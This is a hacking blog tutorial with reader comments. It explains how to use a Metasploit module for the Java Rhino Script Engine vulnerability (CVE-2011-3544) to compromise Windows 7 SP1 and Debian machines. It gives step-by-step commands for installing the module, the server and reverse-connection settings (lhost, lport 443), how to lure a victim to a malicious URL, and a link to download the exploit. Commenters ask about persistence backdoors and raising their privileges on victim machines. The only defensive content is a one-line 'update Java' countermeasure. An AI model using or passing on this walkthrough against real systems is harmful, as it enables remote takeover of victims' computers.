• +
Hacking Windows 7 SP1 via Java Rhino Script Engine Vulnerability

Hacking Windows 7 SP1 via Java Rhino Script Engine Vulnerability

Bookmark

Type : Tutorial

Level : Medium

Attacker O.S : Backtrack 5 R 1

Victim O.S : Windows 7 SP 1, Linux Debian 6

Exploit Credits : Michael Schierl, Juan Vazquez, Edward D. Teach, Sinn3r

This is a vulnerability in the Rhino Script Engine that can be used by a Java Applet to run arbitrary Java code outside of the sandbox. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Oracle Java. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

The quote I got from zerodayinitiative.com. This exploit will attack vulnerability found in Java Runtime environment, all Java version 6, 7 are affected. To view the details of affected Java version, you can refer to this Oracle advisories(http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html).

Requirements :

1. Java Rhino Exploit (download link) and Exploit.class

Download

Step By Step :

1. Download the Java Rhino exploit from the link above, and then copy into following folder

cp java_rhino.rb /pentest/exploits/framework/modules/exploits/multi/browser/

2. Open your Metasploit console by typing msfconsole from terminal, and then use the exploit you've just added before and also set up the payload.

Hacking Windows 7 SP1 via Java Rhino Script Engine Vulnerability

3. The next step you need to define the switch to make sure an attack can be launched successfully, and after everything looks fine and good, we're ready to perform the exploit to run the exploit server.

Hacking Windows 7 SP1 via Java Rhino Script Engine Vulnerability

Information :

set srvhost 192.168.8.93 --> attacker ip address

set srvport 80 --> attacker local port to open

set uripath java_rhino --> uripath to send to victim

set lhost 192.168.8.93 --> address for reverse connection if attack successful

set lport 443 --> local port to handle victim connection if attack success

exploit --> run the exploit

4. The picture below is screenshot from victim when he/she opened the malicious URL.

Hacking Windows 7 SP1 via Java Rhino Script Engine Vulnerability

5. As soon as victim open our malicious link, our metasploit console get something interesting.

Hacking Windows 7 SP1 via Java Rhino Script Engine Vulnerability

Note: if you got this error :

Exception handling request: No such file or directory – /opt/framework3/msf3/data/exploits/cve-2011-3544/Exploit.class

you can see the first comment down here how to solve it.

6. This picture below when I'm try on Debian 6 Iceweasel.

Hacking Windows 7 SP1 via Java Rhino Script Engine Vulnerability

Pwn3d!

Countermeasure :

1. Update your Java Runtime to the newer version.

 

Subscribe Now To Get Latest Hacking Tutorial on Your E-Mail

Share this article if you found this post was useful:

Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com

See all posts by || Visit Website : http://www.vishnuvalentino.com

  • siddy

    PROBLEM

    [*] Server started.
    msf exploit(java_rhino) > [*] Java Applet Rhino Script Engine Remote Code Execution handling request from 192.16x.xxx.x:2287…
    [-] Exception handling request: No such file or directory – /opt/framework3/msf3/data/exploits/cve-2011-3544/Exploit.class

    • v4L

      #siddy
      if you connected to internet, try to msfupdate your metasploit library, maybe there’s some class missing.
      If you didn’t have it, you can download here http://www.mediafire.com/?3krwncd52d3i2dv and put in folder /opt/framework3/msf3/data/exploits/cve-2011-3544/

  • Tom

    Hi man great blog ๐Ÿ™‚ Your article's clear but i got some questions for you :
    1. Is there a way to use this rhino with SET java applet attack ?
    2. rhino attack has limited privileges and cant make use of "run persistance" backdoor, there's a work around for that ?
    "java/java version of Meterpreter is not supported with this Script!"
     

    3. that attack has a poor level privileges and its only possible to upload-download files for other commands it returns errors such
     
    " stdapi_sys_config_getprivs: Operation failed: 1 "
    Loading extension priv…
    [-] Failed to load extension: No such file or directory – /pentest/framework-3.7.1/msf3/data/meterpreter/ext_server_priv.jar
    How to fix that ? i found no solution on net ๐Ÿ™ . Thanx for ur help
     
    My system is : OS          : Windows 7 6.1 (x86)
    Meterpreter : java/java
     

  • Alok

    Hi
    Thanks for this great article. Can i get the payload for this exploit as its not available on the link mentioned. My Email is prabhatalok86@hotmail.com
     

  • Nazmi Hashim

    hi, great article you post there , erm 1 question :-
    why this exploit only work when using firefox browser but not google chrome?

  • yaser

     
    Hi, nice blog. How come it won't create the meterpreter session for me? The only output that I receive is the following:
    [*] 10.1.41.3   java rhino  –  Java Applet Rhino Script Engine Remote Code Execution handling request
    [*] 10.1.41.3   java rhino  –  sending Applet.jar

    • v4L

      #yaser
      maybe the victim use newer java version